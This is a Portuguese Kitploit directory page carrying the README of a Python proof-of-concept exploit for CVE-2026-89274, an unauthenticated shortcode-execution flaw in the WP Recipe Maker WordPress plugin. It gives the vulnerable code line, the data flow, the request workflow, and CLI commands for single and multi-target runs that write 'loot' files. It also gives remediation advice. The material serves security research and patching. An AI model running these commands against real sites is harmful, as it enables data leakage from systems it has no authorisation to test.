Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
By-Poloss..-.CVE-2026-89274 — PoC de exploit em Python para CVE-2026-89274, uma vulnerabilidade de execução arbitrária de shortcode não autenticada no WordPress WP Recipe Maker <= 10.8.1 através de comentários de receitas. | Kitploit
Ferramentas/GitHubGitHub/polosss/by-poloss..-.cve-2026-89274
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubpolosss/by-poloss..-.cve-2026-89274

By-Poloss..-.CVE-2026-89274

PoC de exploit em Python para CVE-2026-89274, uma vulnerabilidade de execução arbitrária de shortcode não autenticada no WordPress WP Recipe Maker <= 10.8.1 através de comentários de receitas.

Ver Repositório
há 5h 11mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-89274 PoC

Poloss : @WPEF0

status python license

Proof-of-Concept exploit para CVE-2026-89274 — vulnerabilidade de Unauthenticated Arbitrary Shortcode Execution no plugin WordPress WP Recipe Maker versão ≤ 10.8.1.

⚠️ AVISO LEGAL E ÉTICO Este script é fornecido apenas para pesquisa de segurança em ambiente local (localhost/lab) e não deve ser usado contra sistemas que não sejam seus ou sem autorização por escrito. O autor não se responsabiliza por uso indevido. O uso contra sistemas de terceiros sem autorização pode violar a lei penal.


📌 Resumo da Vulnerabilidade

CampoValor
CVE IDCVE-2026-89274
AlvoWP Recipe Maker (wp-recipe-maker) ≤ 10.8.1
ClasseCode Injection (CWE-94) — Arbitrary Shortcode Execution
CVSS v3.19.1 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
VetorConteúdo de comentário de receita (unauthenticated)
Sinkdo_shortcode() em class-wprm-metadata.php
ImpactoExecução de shortcode server-side → vazamento de dados via JSON-LD público
AuthorPoloss

Root Cause (patch-diff 10.8.1 → 10.8.4)

includes/public/class-wprm-metadata.php :: sanitize_metadata()

Vulnerable (10.8.1):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags( do_shortcode( $metadata ) ) );

do_shortcode() executa o shortcode primeiro, e então strip_shortcodes() apenas limpa a saída — não há proteção alguma.

Patched (10.8.4):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags(
    WPRM_Instacart::do_shortcode_safe( $metadata ) ) );

Fluxo de Dados

root@kitploit:~
comment_content (comentário público no post da receita)
   └─> reviewBody        (class-wprm-metadata.php:1017)
       └─> $metadata['review'][]   (line 1028)
           └─> sanitize_metadata( get_metadata( $recipe ) )  (line 374)
               └─> do_shortcode( $reviewBody )  ← SINK DE EXECUÇÃO
                   └─> wp_json_encode() para <script type="application/ld+json">

Pré-requisitos

  1. O comentário carrega o campo wprm-comment-rating (preenchido via formulário de comentário).
  2. Comentário aprovado (auto-approve ou manualmente por um moderador).
  3. Nenhuma autenticação é necessária.

⚙️ Instalação

root@kitploit:~
git clone <repo-url>
cd <repo>
python3 -m venv .venv
source .venv/bin/activate     # Windows: .venv\Scripts\activate
# Não há dependências externas — apenas a biblioteca padrão do Python 3.

Requisitos: Python 3.8+.


🚀 Uso

Alvo único

root@kitploit:~
python3 CVE-2026-89274.py -u http://localhost:8080 -p 10 \
    --shortcode '[wprm-recipe-name id=11]' \
    --marker 'PoC Recipe'

Múltiplos alvos (arquivo)

Formato de targets.txt (um por linha, url[,post_id]):

root@kitploit:~
http://lab1.local,10
http://lab2.local,25
# linhas de comentário são ignoradas
http://lab3.local,7
root@kitploit:~
python3 CVE-2026-89274.py -f targets.txt -t 10 -o loot.json

Opções CLI

FlagPadrãoDescrição
-u, --url—URL de alvo único
-f, --file—Arquivo de lista de alvos (url[,post_id] por linha)
-p, --post10ID do post que contém a receita
-t, --threads5Número de worker threads
-o, --outputcve-2026-89274-loot.jsonArquivo de saída JSON
--shortcode[wprm-recipe-name id=11]Payload de shortcode a ser executado
--markerPoC RecipeSubstring de comprovação de execução em reviewBody
--rating5Valor de rating do WPRM
--timeout25Timeout por requisição (segundos)

🔍 Como o Script Funciona

  1. Baseline — GET na página do post, extrai o bloco <script type="application/ld+json">, coleta reviewBody.
  2. Enviar comentário — POST para /wp-comments-post.php com o payload + campo wprm-comment-rating.
  3. Polling — GET novamente na página várias vezes para detectar auto-approval do comentário.
  4. Verificação — Se --marker aparecer em reviewBody → EXPLOITED. Caso contrário → PENDING_APPROVAL.
  5. Saída — Salva os resultados em JSON.

Status de Saída

StatusSignificado
EXPLOITEDShortcode executado e saída vazou para o JSON-LD público
PENDING_APPROVALComentário enviado, aguardando aprovação do moderador
FAILPágina inacessível / comentário rejeitado / erro

📄 Exemplo de Saída JSON

root@kitploit:~
[
  {
    "target": "http://localhost:8080",
    "post_id": 10,
    "shortcode": "[wprm-recipe-name id=11]",
    "marker": "PoC Recipe",
    "author": "poc1716000000",
    "review_bodies": ["PoC Recipe"],
    "status": "EXPLOITED",
    "evidence": "PoC Recipe",
    "note": "shortcode executed server-side; output leaked into public JSON-LD reviewBody",
    "elapsed": 9.12
  }
]

🛡️ Remediação

  • Atualize o WP Recipe Maker para ≥ 10.8.4.
  • Temporariamente, desative comentários nos posts de receita ou defina comment_moderation = 1 e audite comentários rigorosamente.
  • Aplique uma regra de WAF para bloquear sintaxe de shortcode ([...]) no campo de comentário.
  • Audite comentários antigos em busca de payloads de shortcode suspeitos.

📁 Estrutura do Repo

root@kitploit:~
.
├── CVE-2026-89274.py           # exploit principal
└── README.md                   # este documento
Baixar ferramenta